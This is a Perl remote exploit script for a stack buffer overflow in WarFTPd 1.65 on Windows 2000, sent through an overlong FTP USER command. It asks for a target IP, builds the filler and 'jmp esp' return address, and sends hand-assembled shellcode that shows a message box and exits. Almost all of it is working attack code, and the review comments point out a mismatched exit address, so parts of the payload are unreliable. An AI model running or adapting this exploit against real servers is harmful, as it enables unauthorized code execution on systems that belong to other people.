WarFTPd v1.65 for Win2k remote buffer overflow exploit (overlong USER command argument), written in Perl for Win32. The included shellcode pops up a message box and then attempts a clean exit() so the service does not simply crash. Return and API addresses are hard-coded for one Win2k build.
4d51ac1438509a6db6d42e889b5f2204a336e230d13d61319f50f9395026bad2
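use strict;
use warnings;
use IO::Socket;

# WarFTPd 1.65 / Windows 2000 remote stack overflow via the USER command.
# 485 filler bytes reach the saved return address, which is overwritten with
# the address of a "jmp esp" in kernel32.dll so execution continues in the
# bytes that follow on the stack. Every address below is an absolute address
# from one specific Win2k build (per the header comments, non-ASLR era); on
# any other kernel32/msvcrt build the payload will most likely just crash the
# service instead of popping the box.
#Kernel32 jmp esp 7754a3ab
#Kernel32 MessageBoxA 77e375d5
#MSVCRT c_exit 78003985

my $port = 21;
$| = 1;    # flush the prompt before blocking on STDIN

print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";
my $ip = <STDIN>;
die "No target given\n" unless defined $ip;    # EOF on STDIN
chomp $ip;
die "Target must not be empty\n" if $ip eq '';

# Hand-assembled shellcode, byte-for-byte as in the original. It builds the
# NUL-terminated string "Hi!" on the stack, calls MessageBoxA through a
# pointer also stored on the stack, then calls exit() with code 0.
my @shellcode = (
    "\x55",                     # push ebp
    "\x8b\xec",                 # mov ebp,esp
    "\x33\xff",                 # xor edi,edi          ; edi = 0
    "\x57",                     # push edi             ; four zero bytes at [ebp-4]
    "\xc6\x45\xfc\x48",         # mov byte [ebp-4],0x48 ; 'H'
    "\xc6\x45\xfd\x69",         # mov byte [ebp-3],0x69 ; 'i'
    "\xc6\x45\xfe\x21",         # mov byte [ebp-2],0x21 ; '!' ([ebp-1] stays 0 => terminator)
    "\xba\xd5\x75\xe3\x77",     # mov edx,0x77e375d5   ; MessageBoxA
    "\x52",                     # push edx             ; function pointer kept at [ebp-8]
    "\x57",                     # push edi
    "\x8d\x55\xfc",             # lea edx,[ebp-4]      ; edx -> "Hi!"
    "\x52",                     # push edx
    "\x52",                     # push edx
    "\x52",                     # push edx
    "\x57",                     # push edi
    # NOTE(review): five values are pushed for a four-argument stdcall API, so
    # MessageBoxA appears to get hWnd=0, lpText=lpCaption=edx and uType=edx
    # (the string pointer used as a flags mask); the first push edi is surplus.
    # It evidently works, but verify on the target before relying on it.
    "\xff\x55\xf8",             # call dword [ebp-8]   ; MessageBoxA(...)
    "\x55",                     # push ebp             ; start of the exit sequence
    "\x8b\xec",                 # mov ebp,esp
    "\xba\x86\x41\x01\x89",     # mov edx,0x89014186
    "\x81\xea\x01\x08\x01\x11", # sub edx,0x11010201   ; avoids a NUL byte in the literal
    # NOTE(review): 0x89014186 - 0x11010201 = 0x78003F85, which is NOT the
    # 0x78003985 exit address quoted in the header comment. One of the two is
    # off; check against the target msvcrt before counting on the clean exit.
    "\x52",                     # push edx             ; computed address at [ebp-4]
    "\x33\xc0",                 # xor eax,eax
    "\x50",                     # push eax             ; exit code 0
    "\xff\x55\xfc",             # call dword [ebp-4]   ; exit(0)
);

# Build the whole request up front and send it once; the bytes on the wire are
# identical to the original's many small send() calls (TCP is a byte stream).
my $payload = join '',
    "user ",
    "\x90" x 485,               # filler up to the saved return address
    "\xab\xa3\x54\x77",         # EIP <- 0x7754a3ab (kernel32 "jmp esp")
    "\x90" x 5,                 # small NOP sled that jmp esp lands in
    @shellcode,
    "\n";                       # ends the FTP command line (bare LF as in the
                                # original; RFC 959 servers generally want CRLF)

my $sock = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $ip:$port failed: $@\n";
$sock->autoflush(1);

defined $sock->send($payload) or die "send to $ip:$port failed: $!\n";
close $sock or warn "close: $!\n";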